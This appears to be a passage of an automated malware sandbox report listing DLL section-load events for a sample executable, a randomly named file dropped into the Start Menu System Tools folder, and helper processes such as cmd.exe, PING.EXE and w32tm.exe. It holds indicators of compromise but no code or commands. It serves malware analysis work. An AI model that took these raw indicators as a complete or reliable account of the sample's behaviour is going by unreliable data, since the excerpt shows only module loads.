                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dll
